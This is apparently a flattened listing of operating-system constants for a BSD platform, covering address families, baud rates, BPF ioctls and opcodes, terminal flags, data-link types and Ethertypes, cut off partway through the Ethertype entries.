AF_ECMA (line 25) | AF_ECMA = 0x8 constant AF_HYLINK (line 26) | AF_HYLINK = 0xf constant AF_IEEE80211 (line 27) | AF_IEEE80211 = 0x20 constant AF_IMPLINK (line 28) | AF_IMPLINK = 0x3 constant AF_INET (line 29) | AF_INET = 0x2 constant AF_INET6 (line 30) | AF_INET6 = 0x18 constant AF_IPX (line 31) | AF_IPX = 0x17 constant AF_ISDN (line 32) | AF_ISDN = 0x1a constant AF_ISO (line 33) | AF_ISO = 0x7 constant AF_LAT (line 34) | AF_LAT = 0xe constant AF_LINK (line 35) | AF_LINK = 0x12 constant AF_LOCAL (line 36) | AF_LOCAL = 0x1 constant AF_MAX (line 37) | AF_MAX = 0x23 constant AF_MPLS (line 38) | AF_MPLS = 0x21 constant AF_NATM (line 39) | AF_NATM = 0x1b constant AF_NS (line 40) | AF_NS = 0x6 constant AF_OROUTE (line 41) | AF_OROUTE = 0x11 constant AF_OSI (line 42) | AF_OSI = 0x7 constant AF_PUP (line 43) | AF_PUP = 0x4 constant AF_ROUTE (line 44) | AF_ROUTE = 0x22 constant AF_SNA (line 45) | AF_SNA = 0xb constant AF_UNIX (line 46) | AF_UNIX = 0x1 constant AF_UNSPEC (line 47) | AF_UNSPEC = 0x0 constant ARPHRD_ARCNET (line 48) | ARPHRD_ARCNET = 0x7 constant ARPHRD_ETHER (line 49) | ARPHRD_ETHER = 0x1 constant ARPHRD_FRELAY (line 50) | ARPHRD_FRELAY = 0xf constant ARPHRD_IEEE1394 (line 51) | ARPHRD_IEEE1394 = 0x18 constant ARPHRD_IEEE802 (line 52) | ARPHRD_IEEE802 = 0x6 constant ARPHRD_STRIP (line 53) | ARPHRD_STRIP = 0x17 constant B0 (line 54) | B0 = 0x0 constant B110 (line 55) | B110 = 0x6e constant B115200 (line 56) | B115200 = 0x1c200 constant B1200 (line 57) | B1200 = 0x4b0 constant B134 (line 58) | B134 = 0x86 constant B14400 (line 59) | B14400 = 0x3840 constant B150 (line 60) | B150 = 0x96 constant B1800 (line 61) | B1800 = 0x708 constant B19200 (line 62) | B19200 = 0x4b00 constant B200 (line 63) | B200 = 0xc8 constant B230400 (line 64) | B230400 = 0x38400 constant B2400 (line 65) | B2400 = 0x960 constant B28800 (line 66) | B28800 = 0x7080 constant B300 (line 67) | B300 = 0x12c constant B38400 (line 68) | B38400 = 0x9600 constant B460800 (line 69) | B460800 = 0x70800 constant B4800 (line 70) | B4800 = 0x12c0 constant B50 (line 71) | B50 = 0x32 constant B57600 (line 72) | B57600 = 0xe100 constant B600 (line 73) | B600 = 0x258 constant B7200 (line 74) | B7200 = 0x1c20 constant B75 (line 75) | B75 = 0x4b constant B76800 (line 76) | B76800 = 0x12c00 constant B921600 (line 77) | B921600 = 0xe1000 constant B9600 (line 78) | B9600 = 0x2580 constant BIOCFEEDBACK (line 79) | BIOCFEEDBACK = 0x8004427d constant BIOCFLUSH (line 80) | BIOCFLUSH = 0x20004268 constant BIOCGBLEN (line 81) | BIOCGBLEN = 0x40044266 constant BIOCGDLT (line 82) | BIOCGDLT = 0x4004426a constant BIOCGDLTLIST (line 83) | BIOCGDLTLIST = 0xc0084277 constant BIOCGETIF (line 84) | BIOCGETIF = 0x4090426b constant BIOCGFEEDBACK (line 85) | BIOCGFEEDBACK = 0x4004427c constant BIOCGHDRCMPLT (line 86) | BIOCGHDRCMPLT = 0x40044274 constant BIOCGRTIMEOUT (line 87) | BIOCGRTIMEOUT = 0x400c427b constant BIOCGSEESENT (line 88) | BIOCGSEESENT = 0x40044278 constant BIOCGSTATS (line 89) | BIOCGSTATS = 0x4080426f constant BIOCGSTATSOLD (line 90) | BIOCGSTATSOLD = 0x4008426f constant BIOCIMMEDIATE (line 91) | BIOCIMMEDIATE = 0x80044270 constant BIOCPROMISC (line 92) | BIOCPROMISC = 0x20004269 constant BIOCSBLEN (line 93) | BIOCSBLEN = 0xc0044266 constant BIOCSDLT (line 94) | BIOCSDLT = 0x80044276 constant BIOCSETF (line 95) | BIOCSETF = 0x80084267 constant BIOCSETIF (line 96) | BIOCSETIF = 0x8090426c constant BIOCSFEEDBACK (line 97) | BIOCSFEEDBACK = 0x8004427d constant BIOCSHDRCMPLT (line 98) | BIOCSHDRCMPLT = 0x80044275 constant BIOCSRTIMEOUT (line 99) | BIOCSRTIMEOUT = 0x800c427a constant BIOCSSEESENT (line 100) | BIOCSSEESENT = 0x80044279 constant BIOCSTCPF (line 101) | BIOCSTCPF = 0x80084272 constant BIOCSUDPF (line 102) | BIOCSUDPF = 0x80084273 constant BIOCVERSION (line 103) | BIOCVERSION = 0x40044271 constant BPF_A (line 104) | BPF_A = 0x10 constant BPF_ABS (line 105) | BPF_ABS = 0x20 constant BPF_ADD (line 106) | BPF_ADD = 0x0 constant BPF_ALIGNMENT (line 107) | BPF_ALIGNMENT = 0x4 constant BPF_ALIGNMENT32 (line 108) | BPF_ALIGNMENT32 = 0x4 constant BPF_ALU (line 109) | BPF_ALU = 0x4 constant BPF_AND (line 110) | BPF_AND = 0x50 constant BPF_B (line 111) | BPF_B = 0x10 constant BPF_DFLTBUFSIZE (line 112) | BPF_DFLTBUFSIZE = 0x100000 constant BPF_DIV (line 113) | BPF_DIV = 0x30 constant BPF_H (line 114) | BPF_H = 0x8 constant BPF_IMM (line 115) | BPF_IMM = 0x0 constant BPF_IND (line 116) | BPF_IND = 0x40 constant BPF_JA (line 117) | BPF_JA = 0x0 constant BPF_JEQ (line 118) | BPF_JEQ = 0x10 constant BPF_JGE (line 119) | BPF_JGE = 0x30 constant BPF_JGT (line 120) | BPF_JGT = 0x20 constant BPF_JMP (line 121) | BPF_JMP = 0x5 constant BPF_JSET (line 122) | BPF_JSET = 0x40 constant BPF_K (line 123) | BPF_K = 0x0 constant BPF_LD (line 124) | BPF_LD = 0x0 constant BPF_LDX (line 125) | BPF_LDX = 0x1 constant BPF_LEN (line 126) | BPF_LEN = 0x80 constant BPF_LSH (line 127) | BPF_LSH = 0x60 constant BPF_MAJOR_VERSION (line 128) | BPF_MAJOR_VERSION = 0x1 constant BPF_MAXBUFSIZE (line 129) | BPF_MAXBUFSIZE = 0x1000000 constant BPF_MAXINSNS (line 130) | BPF_MAXINSNS = 0x200 constant BPF_MEM (line 131) | BPF_MEM = 0x60 constant BPF_MEMWORDS (line 132) | BPF_MEMWORDS = 0x10 constant BPF_MINBUFSIZE (line 133) | BPF_MINBUFSIZE = 0x20 constant BPF_MINOR_VERSION (line 134) | BPF_MINOR_VERSION = 0x1 constant BPF_MISC (line 135) | BPF_MISC = 0x7 constant BPF_MSH (line 136) | BPF_MSH = 0xa0 constant BPF_MUL (line 137) | BPF_MUL = 0x20 constant BPF_NEG (line 138) | BPF_NEG = 0x80 constant BPF_OR (line 139) | BPF_OR = 0x40 constant BPF_RELEASE (line 140) | BPF_RELEASE = 0x30bb6 constant BPF_RET (line 141) | BPF_RET = 0x6 constant BPF_RSH (line 142) | BPF_RSH = 0x70 constant BPF_ST (line 143) | BPF_ST = 0x2 constant BPF_STX (line 144) | BPF_STX = 0x3 constant BPF_SUB (line 145) | BPF_SUB = 0x10 constant BPF_TAX (line 146) | BPF_TAX = 0x0 constant BPF_TXA (line 147) | BPF_TXA = 0x80 constant BPF_W (line 148) | BPF_W = 0x0 constant BPF_X (line 149) | BPF_X = 0x8 constant BRKINT (line 150) | BRKINT = 0x2 constant CFLUSH (line 151) | CFLUSH = 0xf constant CLOCAL (line 152) | CLOCAL = 0x8000 constant CLONE_CSIGNAL (line 153) | CLONE_CSIGNAL = 0xff constant CLONE_FILES (line 154) | CLONE_FILES = 0x400 constant CLONE_FS (line 155) | CLONE_FS = 0x200 constant CLONE_PID (line 156) | CLONE_PID = 0x1000 constant CLONE_PTRACE (line 157) | CLONE_PTRACE = 0x2000 constant CLONE_SIGHAND (line 158) | CLONE_SIGHAND = 0x800 constant CLONE_VFORK (line 159) | CLONE_VFORK = 0x4000 constant CLONE_VM (line 160) | CLONE_VM = 0x100 constant CPUSTATES (line 161) | CPUSTATES = 0x5 constant CP_IDLE (line 162) | CP_IDLE = 0x4 constant CP_INTR (line 163) | CP_INTR = 0x3 constant CP_NICE (line 164) | CP_NICE = 0x1 constant CP_SYS (line 165) | CP_SYS = 0x2 constant CP_USER (line 166) | CP_USER = 0x0 constant CREAD (line 167) | CREAD = 0x800 constant CRTSCTS (line 168) | CRTSCTS = 0x10000 constant CS5 (line 169) | CS5 = 0x0 constant CS6 (line 170) | CS6 = 0x100 constant CS7 (line 171) | CS7 = 0x200 constant CS8 (line 172) | CS8 = 0x300 constant CSIZE (line 173) | CSIZE = 0x300 constant CSTART (line 174) | CSTART = 0x11 constant CSTATUS (line 175) | CSTATUS = 0x14 constant CSTOP (line 176) | CSTOP = 0x13 constant CSTOPB (line 177) | CSTOPB = 0x400 constant CSUSP (line 178) | CSUSP = 0x1a constant CTL_HW (line 179) | CTL_HW = 0x6 constant CTL_KERN (line 180) | CTL_KERN = 0x1 constant CTL_MAXNAME (line 181) | CTL_MAXNAME = 0xc constant CTL_NET (line 182) | CTL_NET = 0x4 constant CTL_QUERY (line 183) | CTL_QUERY = -0x2 constant DIOCBSFLUSH (line 184) | DIOCBSFLUSH = 0x20006478 constant DLT_A429 (line 185) | DLT_A429 = 0xb8 constant DLT_A653_ICM (line 186) | DLT_A653_ICM = 0xb9 constant DLT_AIRONET_HEADER (line 187) | DLT_AIRONET_HEADER = 0x78 constant DLT_AOS (line 188) | DLT_AOS = 0xde constant DLT_APPLE_IP_OVER_IEEE1394 (line 189) | DLT_APPLE_IP_OVER_IEEE1394 = 0x8a constant DLT_ARCNET (line 190) | DLT_ARCNET = 0x7 constant DLT_ARCNET_LINUX (line 191) | DLT_ARCNET_LINUX = 0x81 constant DLT_ATM_CLIP (line 192) | DLT_ATM_CLIP = 0x13 constant DLT_ATM_RFC1483 (line 193) | DLT_ATM_RFC1483 = 0xb constant DLT_AURORA (line 194) | DLT_AURORA = 0x7e constant DLT_AX25 (line 195) | DLT_AX25 = 0x3 constant DLT_AX25_KISS (line 196) | DLT_AX25_KISS = 0xca constant DLT_BACNET_MS_TP (line 197) | DLT_BACNET_MS_TP = 0xa5 constant DLT_BLUETOOTH_HCI_H4 (line 198) | DLT_BLUETOOTH_HCI_H4 = 0xbb constant DLT_BLUETOOTH_HCI_H4_WITH_PHDR (line 199) | DLT_BLUETOOTH_HCI_H4_WITH_PHDR = 0xc9 constant DLT_CAN20B (line 200) | DLT_CAN20B = 0xbe constant DLT_CAN_SOCKETCAN (line 201) | DLT_CAN_SOCKETCAN = 0xe3 constant DLT_CHAOS (line 202) | DLT_CHAOS = 0x5 constant DLT_CISCO_IOS (line 203) | DLT_CISCO_IOS = 0x76 constant DLT_C_HDLC (line 204) | DLT_C_HDLC = 0x68 constant DLT_C_HDLC_WITH_DIR (line 205) | DLT_C_HDLC_WITH_DIR = 0xcd constant DLT_DECT (line 206) | DLT_DECT = 0xdd constant DLT_DOCSIS (line 207) | DLT_DOCSIS = 0x8f constant DLT_ECONET (line 208) | DLT_ECONET = 0x73 constant DLT_EN10MB (line 209) | DLT_EN10MB = 0x1 constant DLT_EN3MB (line 210) | DLT_EN3MB = 0x2 constant DLT_ENC (line 211) | DLT_ENC = 0x6d constant DLT_ERF (line 212) | DLT_ERF = 0xc5 constant DLT_ERF_ETH (line 213) | DLT_ERF_ETH = 0xaf constant DLT_ERF_POS (line 214) | DLT_ERF_POS = 0xb0 constant DLT_FC_2 (line 215) | DLT_FC_2 = 0xe0 constant DLT_FC_2_WITH_FRAME_DELIMS (line 216) | DLT_FC_2_WITH_FRAME_DELIMS = 0xe1 constant DLT_FDDI (line 217) | DLT_FDDI = 0xa constant DLT_FLEXRAY (line 218) | DLT_FLEXRAY = 0xd2 constant DLT_FRELAY (line 219) | DLT_FRELAY = 0x6b constant DLT_FRELAY_WITH_DIR (line 220) | DLT_FRELAY_WITH_DIR = 0xce constant DLT_GCOM_SERIAL (line 221) | DLT_GCOM_SERIAL = 0xad constant DLT_GCOM_T1E1 (line 222) | DLT_GCOM_T1E1 = 0xac constant DLT_GPF_F (line 223) | DLT_GPF_F = 0xab constant DLT_GPF_T (line 224) | DLT_GPF_T = 0xaa constant DLT_GPRS_LLC (line 225) | DLT_GPRS_LLC = 0xa9 constant DLT_GSMTAP_ABIS (line 226) | DLT_GSMTAP_ABIS = 0xda constant DLT_GSMTAP_UM (line 227) | DLT_GSMTAP_UM = 0xd9 constant DLT_HDLC (line 228) | DLT_HDLC = 0x10 constant DLT_HHDLC (line 229) | DLT_HHDLC = 0x79 constant DLT_HIPPI (line 230) | DLT_HIPPI = 0xf constant DLT_IBM_SN (line 231) | DLT_IBM_SN = 0x92 constant DLT_IBM_SP (line 232) | DLT_IBM_SP = 0x91 constant DLT_IEEE802 (line 233) | DLT_IEEE802 = 0x6 constant DLT_IEEE802_11 (line 234) | DLT_IEEE802_11 = 0x69 constant DLT_IEEE802_11_RADIO (line 235) | DLT_IEEE802_11_RADIO = 0x7f constant DLT_IEEE802_11_RADIO_AVS (line 236) | DLT_IEEE802_11_RADIO_AVS = 0xa3 constant DLT_IEEE802_15_4 (line 237) | DLT_IEEE802_15_4 = 0xc3 constant DLT_IEEE802_15_4_LINUX (line 238) | DLT_IEEE802_15_4_LINUX = 0xbf constant DLT_IEEE802_15_4_NONASK_PHY (line 239) | DLT_IEEE802_15_4_NONASK_PHY = 0xd7 constant DLT_IEEE802_16_MAC_CPS (line 240) | DLT_IEEE802_16_MAC_CPS = 0xbc constant DLT_IEEE802_16_MAC_CPS_RADIO (line 241) | DLT_IEEE802_16_MAC_CPS_RADIO = 0xc1 constant DLT_IPMB (line 242) | DLT_IPMB = 0xc7 constant DLT_IPMB_LINUX (line 243) | DLT_IPMB_LINUX = 0xd1 constant DLT_IPNET (line 244) | DLT_IPNET = 0xe2 constant DLT_IPV4 (line 245) | DLT_IPV4 = 0xe4 constant DLT_IPV6 (line 246) | DLT_IPV6 = 0xe5 constant DLT_IP_OVER_FC (line 247) | DLT_IP_OVER_FC = 0x7a constant DLT_JUNIPER_ATM1 (line 248) | DLT_JUNIPER_ATM1 = 0x89 constant DLT_JUNIPER_ATM2 (line 249) | DLT_JUNIPER_ATM2 = 0x87 constant DLT_JUNIPER_CHDLC (line 250) | DLT_JUNIPER_CHDLC = 0xb5 constant DLT_JUNIPER_ES (line 251) | DLT_JUNIPER_ES = 0x84 constant DLT_JUNIPER_ETHER (line 252) | DLT_JUNIPER_ETHER = 0xb2 constant DLT_JUNIPER_FRELAY (line 253) | DLT_JUNIPER_FRELAY = 0xb4 constant DLT_JUNIPER_GGSN (line 254) | DLT_JUNIPER_GGSN = 0x85 constant DLT_JUNIPER_ISM (line 255) | DLT_JUNIPER_ISM = 0xc2 constant DLT_JUNIPER_MFR (line 256) | DLT_JUNIPER_MFR = 0x86 constant DLT_JUNIPER_MLFR (line 257) | DLT_JUNIPER_MLFR = 0x83 constant DLT_JUNIPER_MLPPP (line 258) | DLT_JUNIPER_MLPPP = 0x82 constant DLT_JUNIPER_MONITOR (line 259) | DLT_JUNIPER_MONITOR = 0xa4 constant DLT_JUNIPER_PIC_PEER (line 260) | DLT_JUNIPER_PIC_PEER = 0xae constant DLT_JUNIPER_PPP (line 261) | DLT_JUNIPER_PPP = 0xb3 constant DLT_JUNIPER_PPPOE (line 262) | DLT_JUNIPER_PPPOE = 0xa7 constant DLT_JUNIPER_PPPOE_ATM (line 263) | DLT_JUNIPER_PPPOE_ATM = 0xa8 constant DLT_JUNIPER_SERVICES (line 264) | DLT_JUNIPER_SERVICES = 0x88 constant DLT_JUNIPER_ST (line 265) | DLT_JUNIPER_ST = 0xc8 constant DLT_JUNIPER_VP (line 266) | DLT_JUNIPER_VP = 0xb7 constant DLT_LAPB_WITH_DIR (line 267) | DLT_LAPB_WITH_DIR = 0xcf constant DLT_LAPD (line 268) | DLT_LAPD = 0xcb constant DLT_LIN (line 269) | DLT_LIN = 0xd4 constant DLT_LINUX_EVDEV (line 270) | DLT_LINUX_EVDEV = 0xd8 constant DLT_LINUX_IRDA (line 271) | DLT_LINUX_IRDA = 0x90 constant DLT_LINUX_LAPD (line 272) | DLT_LINUX_LAPD = 0xb1 constant DLT_LINUX_SLL (line 273) | DLT_LINUX_SLL = 0x71 constant DLT_LOOP (line 274) | DLT_LOOP = 0x6c constant DLT_LTALK (line 275) | DLT_LTALK = 0x72 constant DLT_MFR (line 276) | DLT_MFR = 0xb6 constant DLT_MOST (line 277) | DLT_MOST = 0xd3 constant DLT_MPLS (line 278) | DLT_MPLS = 0xdb constant DLT_MTP2 (line 279) | DLT_MTP2 = 0x8c constant DLT_MTP2_WITH_PHDR (line 280) | DLT_MTP2_WITH_PHDR = 0x8b constant DLT_MTP3 (line 281) | DLT_MTP3 = 0x8d constant DLT_NULL (line 282) | DLT_NULL = 0x0 constant DLT_PCI_EXP (line 283) | DLT_PCI_EXP = 0x7d constant DLT_PFLOG (line 284) | DLT_PFLOG = 0x75 constant DLT_PFSYNC (line 285) | DLT_PFSYNC = 0x12 constant DLT_PPI (line 286) | DLT_PPI = 0xc0 constant DLT_PPP (line 287) | DLT_PPP = 0x9 constant DLT_PPP_BSDOS (line 288) | DLT_PPP_BSDOS = 0xe constant DLT_PPP_ETHER (line 289) | DLT_PPP_ETHER = 0x33 constant DLT_PPP_PPPD (line 290) | DLT_PPP_PPPD = 0xa6 constant DLT_PPP_SERIAL (line 291) | DLT_PPP_SERIAL = 0x32 constant DLT_PPP_WITH_DIR (line 292) | DLT_PPP_WITH_DIR = 0xcc constant DLT_PRISM_HEADER (line 293) | DLT_PRISM_HEADER = 0x77 constant DLT_PRONET (line 294) | DLT_PRONET = 0x4 constant DLT_RAIF1 (line 295) | DLT_RAIF1 = 0xc6 constant DLT_RAW (line 296) | DLT_RAW = 0xc constant DLT_RAWAF_MASK (line 297) | DLT_RAWAF_MASK = 0x2240000 constant DLT_RIO (line 298) | DLT_RIO = 0x7c constant DLT_SCCP (line 299) | DLT_SCCP = 0x8e constant DLT_SITA (line 300) | DLT_SITA = 0xc4 constant DLT_SLIP (line 301) | DLT_SLIP = 0x8 constant DLT_SLIP_BSDOS (line 302) | DLT_SLIP_BSDOS = 0xd constant DLT_SUNATM (line 303) | DLT_SUNATM = 0x7b constant DLT_SYMANTEC_FIREWALL (line 304) | DLT_SYMANTEC_FIREWALL = 0x63 constant DLT_TZSP (line 305) | DLT_TZSP = 0x80 constant DLT_USB (line 306) | DLT_USB = 0xba constant DLT_USB_LINUX (line 307) | DLT_USB_LINUX = 0xbd constant DLT_USB_LINUX_MMAPPED (line 308) | DLT_USB_LINUX_MMAPPED = 0xdc constant DLT_WIHART (line 309) | DLT_WIHART = 0xdf constant DLT_X2E_SERIAL (line 310) | DLT_X2E_SERIAL = 0xd5 constant DLT_X2E_XORAYA (line 311) | DLT_X2E_XORAYA = 0xd6 constant DT_BLK (line 312) | DT_BLK = 0x6 constant DT_CHR (line 313) | DT_CHR = 0x2 constant DT_DIR (line 314) | DT_DIR = 0x4 constant DT_FIFO (line 315) | DT_FIFO = 0x1 constant DT_LNK (line 316) | DT_LNK = 0xa constant DT_REG (line 317) | DT_REG = 0x8 constant DT_SOCK (line 318) | DT_SOCK = 0xc constant DT_UNKNOWN (line 319) | DT_UNKNOWN = 0x0 constant DT_WHT (line 320) | DT_WHT = 0xe constant ECHO (line 321) | ECHO = 0x8 constant ECHOCTL (line 322) | ECHOCTL = 0x40 constant ECHOE (line 323) | ECHOE = 0x2 constant ECHOK (line 324) | ECHOK = 0x4 constant ECHOKE (line 325) | ECHOKE = 0x1 constant ECHONL (line 326) | ECHONL = 0x10 constant ECHOPRT (line 327) | ECHOPRT = 0x20 constant EMUL_LINUX (line 328) | EMUL_LINUX = 0x1 constant EMUL_LINUX32 (line 329) | EMUL_LINUX32 = 0x5 constant EMUL_MAXID (line 330) | EMUL_MAXID = 0x6 constant EN_SW_CTL_INF (line 331) | EN_SW_CTL_INF = 0x1000 constant EN_SW_CTL_PREC (line 332) | EN_SW_CTL_PREC = 0x300 constant EN_SW_CTL_ROUND (line 333) | EN_SW_CTL_ROUND = 0xc00 constant EN_SW_DATACHAIN (line 334) | EN_SW_DATACHAIN = 0x80 constant EN_SW_DENORM (line 335) | EN_SW_DENORM = 0x2 constant EN_SW_INVOP (line 336) | EN_SW_INVOP = 0x1 constant EN_SW_OVERFLOW (line 337) | EN_SW_OVERFLOW = 0x8 constant EN_SW_PRECLOSS (line 338) | EN_SW_PRECLOSS = 0x20 constant EN_SW_UNDERFLOW (line 339) | EN_SW_UNDERFLOW = 0x10 constant EN_SW_ZERODIV (line 340) | EN_SW_ZERODIV = 0x4 constant ETHERCAP_JUMBO_MTU (line 341) | ETHERCAP_JUMBO_MTU = 0x4 constant ETHERCAP_VLAN_HWTAGGING (line 342) | ETHERCAP_VLAN_HWTAGGING = 0x2 constant ETHERCAP_VLAN_MTU (line 343) | ETHERCAP_VLAN_MTU = 0x1 constant ETHERMIN (line 344) | ETHERMIN = 0x2e constant ETHERMTU (line 345) | ETHERMTU = 0x5dc constant ETHERMTU_JUMBO (line 346) | ETHERMTU_JUMBO = 0x2328 constant ETHERTYPE_8023 (line 347) | ETHERTYPE_8023 = 0x4 constant ETHERTYPE_AARP (line 348) | ETHERTYPE_AARP = 0x80f3 constant ETHERTYPE_ACCTON (line 349) | ETHERTYPE_ACCTON = 0x8390 constant ETHERTYPE_AEONIC (line 350) | ETHERTYPE_AEONIC = 0x8036 constant ETHERTYPE_ALPHA (line 351) | ETHERTYPE_ALPHA = 0x814a constant ETHERTYPE_AMBER (line 352) | ETHERTYPE_AMBER = 0x6008 constant ETHERTYPE_AMOEBA (line 353) | ETHERTYPE_AMOEBA = 0x8145 constant ETHERTYPE_APOLLO (line 354) | ETHERTYPE_APOLLO = 0x80f7 constant ETHERTYPE_APOLLODOMAIN (line 355) | ETHERTYPE_APOLLODOMAIN = 0x8019 constant ETHERTYPE_APPLETALK (line 356) | ETHERTYPE_APPLETALK = 0x809b constant ETHERTYPE_APPLITEK (line 357) | ETHERTYPE_APPLITEK = 0x80c7 constant ETHERTYPE_ARGONAUT (line 358) | ETHERTYPE_ARGONAUT = 0x803a constant ETHERTYPE_ARP (line 359) | ETHERTYPE_ARP = 0x806 constant ETHERTYPE_AT (line 360) | ETHERTYPE_AT = 0x809b constant ETHERTYPE_ATALK (line 361) | ETHERTYPE_ATALK = 0x809b constant ETHERTYPE_ATOMIC (line 362) | ETHERTYPE_ATOMIC = 0x86df constant ETHERTYPE_ATT (line 363) | ETHERTYPE_ATT = 0x8069 constant ETHERTYPE_ATTSTANFORD (line 364) | ETHERTYPE_ATTSTANFORD = 0x8008 constant ETHERTYPE_AUTOPHON (line 365) | ETHERTYPE_AUTOPHON = 0x806a constant ETHERTYPE_AXIS (line 366) | ETHERTYPE_AXIS = 0x8856 constant ETHERTYPE_BCLOOP (line 367) | ETHERTYPE_BCLOOP = 0x9003 constant ETHERTYPE_BOFL (line 368) | ETHERTYPE_BOFL = 0x8102 constant ETHERTYPE_CABLETRON (line 369) | ETHERTYPE_CABLETRON = 0x7034 constant ETHERTYPE_CHAOS (line 370) | ETHERTYPE_CHAOS = 0x804 constant ETHERTYPE_COMDESIGN (line 371) | ETHERTYPE_COMDESIGN = 0x806c constant ETHERTYPE_COMPUGRAPHIC (line 372) | ETHERTYPE_COMPUGRAPHIC = 0x806d constant ETHERTYPE_COUNTERPOINT (line 373) | ETHERTYPE_COUNTERPOINT = 0x8062 constant ETHERTYPE_CRONUS (line 374) | ETHERTYPE_CRONUS = 0x8004 constant ETHERTYPE_CRONUSVLN (line 375) | ETHERTYPE_CRONUSVLN = 0x8003 constant ETHERTYPE_DCA (line 376) | ETHERTYPE_DCA = 0x1234 constant ETHERTYPE_DDE (line 377) | ETHERTYPE_DDE = 0x807b constant ETHERTYPE_DEBNI (line 378) | ETHERTYPE_DEBNI = 0xaaaa constant ETHERTYPE_DECAM (line 379) | ETHERTYPE_DECAM = 0x8048 constant ETHERTYPE_DECCUST (line 380) | ETHERTYPE_DECCUST = 0x6006 constant ETHERTYPE_DECDIAG (line 381) | ETHERTYPE_DECDIAG = 0x6005 constant ETHERTYPE_DECDNS (line 382) | ETHERTYPE_DECDNS = 0x803c constant ETHERTYPE_DECDTS (line 383) | ETHERTYPE_DECDTS = 0x803e constant ETHERTYPE_DECEXPER (line 384) | ETHERTYPE_DECEXPER = 0x6000 constant ETHERTYPE_DECLAST (line 385) | ETHERTYPE_DECLAST = 0x8041 constant ETHERTYPE_DECLTM (line 386) | ETHERTYPE_DECLTM = 0x803f constant ETHERTYPE_DECMUMPS (line 387) | ETHERTYPE_DECMUMPS = 0x6009 constant ETHERTYPE_DECNETBIOS (line 388) | ETHERTYPE_DECNETBIOS = 0x8040 constant ETHERTYPE_DELTACON (line 389) | ETHERTYPE_DELTACON = 0x86de constant ETHERTYPE_DIDDLE (line 390) | ETHERTYPE_DIDDLE = 0x4321 constant ETHERTYPE_DLOG1 (line 391) | ETHERTYPE_DLOG1 = 0x660 constant ETHERTYPE_DLOG2 (line 392) | ETHERTYPE_DLOG2 = 0x661 constant ETHERTYPE_DN (line 393) | ETHERTYPE_DN = 0x6003 constant ETHERTYPE_DOGFIGHT (line 394) | ETHERTYPE_DOGFIGHT = 0x1989 constant ETHERTYPE_DSMD (line 395) | ETHERTYPE_DSMD = 0x8039 constant ETHERTYPE_ECMA (line 396) | ETHERTYPE_ECMA = 0x803 constant ETHERTYPE_ENCRYPT (line 397) | ETHERTYPE_ENCRYPT = 0x803d constant ETHERTYPE_ES (line 398) | ETHERTYPE_ES = 0x805d constant ETHERTYPE_EXCELAN (line 399) | ETHERTYPE_EXCELAN = 0x8010 constant ETHERTYPE_EXPERDATA (line 400) | ETHERTYPE_EXPERDATA = 0x8049 constant ETHERTYPE_FLIP (line 401) | ETHERTYPE_FLIP = 0x8146 constant ETHERTYPE_FLOWCONTROL (line 402) | ETHERTYPE_FLOWCONTROL = 0x8808 constant ETHERTYPE_FRARP (line 403) | ETHERTYPE_FRARP = 0x808 constant ETHERTYPE_GENDYN (line 404) | ETHERTYPE_GENDYN = 0x8068 constant ETHERTYPE_HAYES (line 405) | ETHERTYPE_HAYES = 0x8130 constant ETHERTYPE_HIPPI_FP (line 406) | ETHERTYPE_HIPPI_FP = 0x8180 constant ETHERTYPE_HITACHI (line 407) | ETHERTYPE_HITACHI = 0x8820 constant ETHERTYPE_HP (line 408) | ETHERTYPE_HP = 0x8005 constant ETHERTYPE_IEEEPUP (line 409) | ETHERTYPE_IEEEPUP = 0xa00 constant ETHERTYPE_IEEEPUPAT (line 410) | ETHERTYPE_IEEEPUPAT = 0xa01 constant ETHERTYPE_IMLBL (line 411) | ETHERTYPE_IMLBL = 0x4c42 constant ETHERTYPE_IMLBLDIAG (line 412) | ETHERTYPE_IMLBLDIAG = 0x424c constant ETHERTYPE_IP (line 413) | ETHERTYPE_IP = 0x800 constant ETHERTYPE_IPAS (line 414) | ETHERTYPE_IPAS = 0x876c constant ETHERTYPE_IPV6 (line 415) | ETHERTYPE_IPV6 = 0x86dd constant ETHERTYPE_IPX (line 416) | ETHERTYPE_IPX = 0x8137 constant ETHERTYPE_IPXNEW (line 417) | ETHERTYPE_IPXNEW = 0x8037 constant ETHERTYPE_KALPANA (line 418) | ETHERTYPE_KALPANA = 0x8582 constant ETHERTYPE_LANBRIDGE (line 419) | ETHERTYPE_LANBRIDGE = 0x8038 constant ETHERTYPE_LANPROBE (line 420) | ETHERTYPE_LANPROBE = 0x8888 constant ETHERTYPE_LAT (line 421) | ETHERTYPE_LAT = 0x6004 constant ETHERTYPE_LBACK (line 422) | ETHERTYPE_LBACK = 0x9000 constant ETHERTYPE_LITTLE (line 423) | ETHERTYPE_LITTLE = 0x8060 constant ETHERTYPE_LOGICRAFT (line 424) | ETHERTYPE_LOGICRAFT = 0x8148 constant ETHERTYPE_LOOPBACK (line 425) | ETHERTYPE_LOOPBACK = 0x9000 constant ETHERTYPE_MATRA (line 426) | ETHERTYPE_MATRA = 0x807a constant ETHERTYPE_MAX (line 427) | ETHERTYPE_MAX = 0xffff constant ETHERTYPE_MERIT (line 428) | ETHERTYPE_MERIT = 0x807c constant ETHERTYPE_MICP (line 429) | ETHERTYPE_MICP = 0x873a constant ETHERTYPE_MOPDL (line 430) | ETHERTYPE_MOPDL = 0x6001 constant ETHERTYPE_MOPRC (line 431) | ETHERTYPE_MOPRC = 0x6002 constant ETHERTYPE_MOTOROLA (line 432) | ETHERTYPE_MOTOROLA = 0x818d constant ETHERTYPE_MPLS (line 433) | ETHERTYPE_MPLS = 0x8847 constant ETHERTYPE_MPLS_MCAST (line 434) | ETHERTYPE_MPLS_MCAST = 0x8848 constant ETHERTYPE_MUMPS (line 435) | ETHERTYPE_MUMPS = 0x813f constant ETHERTYPE_NBPCC (line 436) | ETHERTYPE_NBPCC = 0x3c04 constant ETHERTYPE_NBPCLAIM (line 437) | ETHERTYPE_NBPCLAIM = 0x3c09 constant ETHERTYPE_NBPCLREQ (line 438) | ETHERTYPE_NBPCLREQ = 0x3c05 constant ETHERTYPE_NBPCLRSP (line 439) | ETHERTYPE_NBPCLRSP = 0x3c06 constant ETHERTYPE_NBPCREQ (line 440) | ETHERTYPE_NBPCREQ = 0x3c02 constant ETHERTYPE_NBPCRSP (line 441) | ETHERTYPE_NBPCRSP = 0x3c03 constant ETHERTYPE_NBPDG (line 442) | ETHERTYPE_NBPDG = 0x3c07 constant ETHERTYPE_NBPDGB (line 443) | ETHERTYPE_NBPDGB = 0x3c08 constant ETHERTYPE_NBPDLTE (line 444) | ETHERTYPE_NBPDLTE = 0x3c0a constant 